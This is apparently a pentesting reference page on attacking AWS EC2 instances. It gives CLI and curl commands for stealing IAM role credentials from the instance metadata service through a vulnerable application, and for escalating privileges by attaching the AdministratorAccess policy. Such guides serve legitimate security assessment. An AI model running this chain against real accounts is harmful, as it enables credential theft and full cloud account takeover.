💻 EC2

📚 What is EC2 ?

Amazon Elastic Compute Cloud (EC2) is a web service that provides resizable compute capacity in the cloud. It is designed to make web-scale cloud computing easier for developers.

Enumerating EC2 Instances

To enumerate EC2 instances, in an organization's AWS account, you can use the AWS CLI tool. The following command lists all the instances in the specified profile :

bash

aws ec2 describe-instances --profile auditor

Exploiting Public-Facing Applications Running on EC2 Instances

Retrieving Temporary Credentials

EC2 instances can be configured with IAM roles that provide temporary credentials. These credentials are accessible from the instance metadata service. If an application running on an EC2 instance is publicly accessible and vulnerable, an attacker can exploit it to retrieve these credentials.

To retrieve the temporary credentials, you can use the following command :

bash

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-role

The response will be in the following format :

bash

{
  "Code" : "Success",
  "LastUpdated" : "2024-06-24T06:40:51Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAUI7[...]",
  "SecretAccessKey" : "bRF9sLI[...]",
  "Token" : "IQoJb3JpZ2luX2VjEPf[...]",
  "Expiration" : "2024-06-24T13:07:29Z"
}

Getting the Managed Policy Attached to EC2 Instance

Once you have retrieved the temporary credentials, you can use them to further enumerate and interact with AWS resources. To get the managed policies attached to the EC2 instance role, use the following command :

bash

aws iam list-attached-role-policies --role-name ec2-role --profile auditor

Retrieving Inline Policies

To retrieve inline policies that are directly attached to the EC2 instance role, use the following commands :

List the inline policies attached to the role :

bash

aws iam list-role-policies --role-name ec2-role --profile auditor

Get the permissions defined in an inline policy :

bash

aws iam get-role-policy --role-name ec2-role --policy-name inline-policy --profile auditor

Attaching Administrator Policy

If you have sufficient permissions, you can escalate privileges by attaching an administrator policy to the role. This can give you full access to all AWS resources.

To attach the AdministratorAccess policy to the EC2 instance role, use the following command :

bash

aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name ec2-role --profile auditor

💻 EC2 ​

📚 What is EC2 ? ​

Enumerating EC2 Instances ​

Exploiting Public-Facing Applications Running on EC2 Instances ​

Retrieving Temporary Credentials ​

Getting the Managed Policy Attached to EC2 Instance ​

Retrieving Inline Policies ​

Attaching Administrator Policy ​

💻 EC2

📚 What is EC2 ?

Enumerating EC2 Instances

Exploiting Public-Facing Applications Running on EC2 Instances

Retrieving Temporary Credentials

Getting the Managed Policy Attached to EC2 Instance

Retrieving Inline Policies

Attaching Administrator Policy